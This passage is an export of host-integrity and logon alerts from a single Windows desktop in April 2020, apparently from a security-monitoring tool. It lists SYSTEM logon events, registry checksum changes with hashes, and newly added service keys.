+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:19:18.979",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:19:18.932",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. 
the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:19:16.338",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '5de781a93c0a6c5d5144068810a7e1b5' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '09d2f3723a2d55175f72d45ef9f690a25bbba0c6' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +", +"Apr 24, 2020 @ 13:19:16.306",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '29f6279048392e596b289f171bfe2117' +New md5sum is : 'f5e14498d88793ab9e47ba95008e4f35' +Old sha1sum was: 'fb61655b893457d5b89950bcb8e574fb0c2b2ee0' +New sha1sum is : '572aa3d10a303409c35a7f5afc5aaacefa8eabdd' +", +"Apr 24, 2020 @ 13:19:16.291",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: '6802c32dd7e97c204d9b4a5103edb8fd' +New md5sum is : 'bf02f240281a1be47db753d1369bc887' +Old sha1sum was: 'a3026a7f639946e032b0592d9980b64bf802ba17' +New sha1sum is : '7f27010184bfe5915bac77ef2d4b82c97b694471' +", +"Apr 24, 2020 @ 13:19:15.478",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '711af8bef5843e2b181a65e02f7ec4e7' +New md5sum is : '92492b6125d7a64a6c867269318db81a' +Old sha1sum was: '38360c17547cafecdf62b6be07a2e1aff8bca9dd' +New sha1sum is : '95e95e5c4e1f969e302d45ad055d83e5811ca397' +", +"Apr 24, 2020 @ 13:19:13.995",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +New md5sum is : '64365e10e79becaacc4b6257a583c30a' +Old sha1sum was: 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +New sha1sum is : '18c33905fecebf510aa8a907616f86a31385ab5e' +", +"Apr 24, 2020 @ 13:19:13.720",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'bd63601b6f69031fc9053f7f5e9994b3' +New md5sum is : '68ac86b26a245d900a16ed993efba173' +Old sha1sum was: '8919a69432dd58f4818fdb4b7f15495900ea20ed' +New sha1sum is : 'b452118250c6d9b0aa3e8f42e324a861d6b04637' +", +"Apr 24, 2020 @ 13:19:13.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:19:13.416",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:19:12.822",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'aca2086634cad666bcfa5ce02c60723b' +New md5sum is : '4167ad01062b429fe5857a5a6dc703af' +Old sha1sum was: '01964f5117f31b451d06a4b44965af64482e8693' +New sha1sum is : '6d8722863bf5d41401f409cf8aa35ab5ed1125bb' +", +"Apr 24, 2020 @ 13:19:12.667",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '671fdf6ae1d3621c0a477079b6ab0354' +New md5sum is : 'a3a2750b960ee36c1bb74f83dab7d8c6' +Old sha1sum was: '14ea7fe43e6e733427540b1d51575677cb5e4c70' +New sha1sum is : 'a36891877a9c4b74bf2bed979ea687633c20cc43' +", +"Apr 24, 2020 @ 13:19:12.228",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:19:12.216",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:19:12.041",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +New md5sum is : '64365e10e79becaacc4b6257a583c30a' +Old sha1sum was: 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +New sha1sum is : '18c33905fecebf510aa8a907616f86a31385ab5e' +", +"Apr 24, 2020 @ 13:19:10.998",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 13:19:09.607",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: 'a5e73c9f12ca5ca1a2e91341b6d7e1e1' +New md5sum is : '25ef42efe37ad3eed184fd9bb31305d4' +Old sha1sum was: 'ddad54675629131da3047b42c43628bd747e5262' +New sha1sum is : '4aa3eb6eb04b0d62d1a922458a12321e137ff48b' +", +"Apr 24, 2020 @ 13:19:05.822",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '106c676c812191a74d1c845f04603231' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '935b4cfc84744b913c948f1140563c880fa44307' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 13:19:03.589",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '6fba24441f7c19e08b81d5840e9e62af' +New md5sum is : '5689c2dd6ed61a04cc389b6099c0aea5' +Old sha1sum was: '915cf0aee85628bc7ab27c3b65968f0090fc5e9a' +New sha1sum is : '64932df77c40a56e97edb3553ce359b3aaff132e' +", +"Apr 24, 2020 @ 13:19:03.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'abe41aab895e504aa874d1b2b8792e94' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '9daf66238ba18f6f989346a0d4ba77fa2e949329' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 13:19:03.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: 'b53bf2f3f61682c350be645945192116' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 24, 2020 @ 13:18:57.308",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:15:54Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:18:56.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'f7e3ede101883838642b014adb830ba3' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '77ead1a75e96863caf4602afa49e9fabf7cf3623' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 13:18:54.573",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:54.557",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:53.980",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:53.971",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:52.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:52.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:51.591",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. 
+Old md5sum was: '8879c1edeb0f0361bd37d770e7639bb2' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '17ce46a3267c30cb6b7fdcabb90044e72d2e065c' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 13:18:49.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'fb276bc3254926295315efd699a5f0ce' +New md5sum is : '0730f5b2407e5339e63c1c3734fd2546' +Old sha1sum was: 'b7489e940ba2819e44a06f3b6c370f25b1bd5a26' +New sha1sum is : '4235ab187e25827a7b2ebbab7afab242b93a9080' +", +"Apr 24, 2020 @ 13:18:47.698",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '38693b218d0d1cfbe8aa44b2759f5e0a' +New md5sum is : '860a7b9ab2a6fbf545bfc384440a8e7b' +Old sha1sum was: '7e71bd80049f0a54f2ff10b576253aee0f92597e' +New sha1sum is : 'f39274c3af5f370a839f6377680dcf2fc740aa48' +", +"Apr 24, 2020 @ 13:18:46.760",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'f7ff7d512129b2231c517bc98c61895a' +New md5sum is : 'dee9fe5e4e31860f2ee77873f5d87534' +Old sha1sum was: '8ad4b6c00e384185ef05b860966037e851115017' +New sha1sum is : '00a0e6ea5491f52170666054348def61f8210cb5' +", +"Apr 24, 2020 @ 13:18:46.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:46.634",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f13d\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:18:46.619",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f13d\Security' was added. 
+", +"Apr 24, 2020 @ 13:18:42.432",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'a635cc7d63339ac3075b507a97dc0727' +New md5sum is : 'f93d80905ae8d4f7b3b1d14093e01cfb' +Old sha1sum was: '2ab013a07ae2703176febea130ae9ddc53ac1615' +New sha1sum is : '76dfbf0000655365da25fcaeae59a5577fea6d3e' +", +"Apr 24, 2020 @ 13:18:41.104",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '1de56df874baf63b698941817624f3e7' +New md5sum is : '0730f5b2407e5339e63c1c3734fd2546' +Old sha1sum was: '5bae7edca7bfded5a62882384016c3e950aa6ada' +New sha1sum is : '4235ab187e25827a7b2ebbab7afab242b93a9080' +", +"Apr 24, 2020 @ 13:18:36.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '549d5493f97506ca14eb416c7cc49e4d' +New md5sum is : 'a839274b2b2581686d6377468ce22fb7' +Old sha1sum was: '48103930a75d17911b2f04f0163afdbadea50b74' +New sha1sum is : 'b3588e247e7e973a4ff788f4b76b45e3f484e8ad' +", +"Apr 24, 2020 @ 13:18:36.025",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '7623ffed143b7459169ba5677dbcbf32' +New md5sum is : '8689e28cb67cdeb16cd0f213c561238e' +Old sha1sum was: '0a808618d3ad142d9f619d043ca088fdcfc9a841' +New sha1sum is : '9a0d97c845587be7605acb61023bb439126934df' +", +"Apr 24, 2020 @ 13:18:35.963",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1de56df874baf63b698941817624f3e7' +New md5sum is : '0730f5b2407e5339e63c1c3734fd2546' +Old sha1sum was: '5bae7edca7bfded5a62882384016c3e950aa6ada' +New sha1sum is : '4235ab187e25827a7b2ebbab7afab242b93a9080' +", +"Apr 24, 2020 @ 13:18:34.900",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '1c6e2319780c0264f929f3c3433add82' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'f924403989ef2de336c156640b73fb0db5024306' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 13:18:27.386",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:18:27.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '6073decf84a173eeedd11a3559b16ec1' +New md5sum is : '318460bc67692e1abeb6ac8620e2d5d2' +Old sha1sum was: 'f18af090c617e4708f33242930b7538c92479f32' +New sha1sum is : 'f3d4f1d8d84044bd1af1d2710eba79efdc96081d' +", +"Apr 24, 2020 @ 13:18:22.931",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Chrome' checksum changed. +Old md5sum was: '22ece9a19429dc28f03e236b27d22f81' +New md5sum is : '5af3a18aae7113a12564a454973b2929' +Old sha1sum was: 'd43b78e147f35d6834e93dded1d3c6395c512b09' +New sha1sum is : '0a00a2e519a32df06bc9533712e616c7a04e7c55' +", +"Apr 24, 2020 @ 13:18:21.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DsmSvc\State' checksum changed. 
+Old md5sum was: '337372d37495ffa03af7fb2939b06f7c' +New md5sum is : '0198bcaeee59286a64643354db674151' +Old sha1sum was: '061dc9d6d1ad801983b5a20ed55b6e67deb57c75' +New sha1sum is : 'dbca19c2b9d5df7e6bfc7f3a68bbf2892febac0b' +", +"Apr 24, 2020 @ 13:18:20.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: 'cce358497fdfdde2833a161f70210463' +New md5sum is : 'ceb071f7c3931d375ab5d39f59ceb095' +Old sha1sum was: 'd63f655305d47c49eeeee9df2ad94c7fd2ec28a2' +New sha1sum is : 'e67a17f8a2b27be4d2f41ac9baaed61e4f01e5e4' +", +"Apr 24, 2020 @ 13:18:19.244",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:19.229",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:19.151",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:19.135",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:18.876",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:18.857",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:17.838",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f13d' was added. 
+", +"Apr 24, 2020 @ 13:18:17.823",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:17.637",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:17.623",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:15.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +New md5sum is : '64365e10e79becaacc4b6257a583c30a' +Old sha1sum was: 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +New sha1sum is : '18c33905fecebf510aa8a907616f86a31385ab5e' +", +"Apr 24, 2020 @ 13:18:14.416",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:14.403",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:14.246",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:14.230",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:14.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:14.135",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f13d\Security' was added. 
+", +"Apr 24, 2020 @ 13:18:13.744",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 13:18:11.908",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:11.879",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 13:18:11.845",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 13:18:11.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 13:18:11.738",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 13:18:11.719",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:18:11.705",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:11.521",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 24, 2020 @ 13:18:10.655",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f13d' was added. 
+", +"Apr 24, 2020 @ 13:18:10.638",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:10.323",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f95a12e467bbf352a90602d9f025d5d' +New md5sum is : '8bb6c0956c2766c58c1a9a1efc45a28c' +Old sha1sum was: 'c5c884aae620a6430070a4a03dc8d115ad37148f' +New sha1sum is : '9987f79cd34a26b46e6fd604087e2270b8c49cf1' +", +"Apr 24, 2020 @ 13:18:10.307",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a73a335588651cfda297cd10b7ebe55e' +New md5sum is : '105e7d5045a9d20c4e9bfe6e31c4d5f4' +Old sha1sum was: '36e61788f9f92ff546c43f33c5b94f4b7e4609ce' +New sha1sum is : '3b1edbab1cd6af7b0103a1e985a900a15cd3d2f1' +", +"Apr 24, 2020 @ 13:18:10.275",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'f90b0689dbdea07bf5bf46f391e73bca' +New md5sum is : '9b2eb62ca4c74330ffa1448b22e6dfac' +Old sha1sum was: '718d3adbe4f76654fbcafae76e4dc88b8a9b8325' +New sha1sum is : '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +", +"Apr 24, 2020 @ 13:18:07.776",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:18:07.763",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:18:07.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\3ware' checksum changed. 
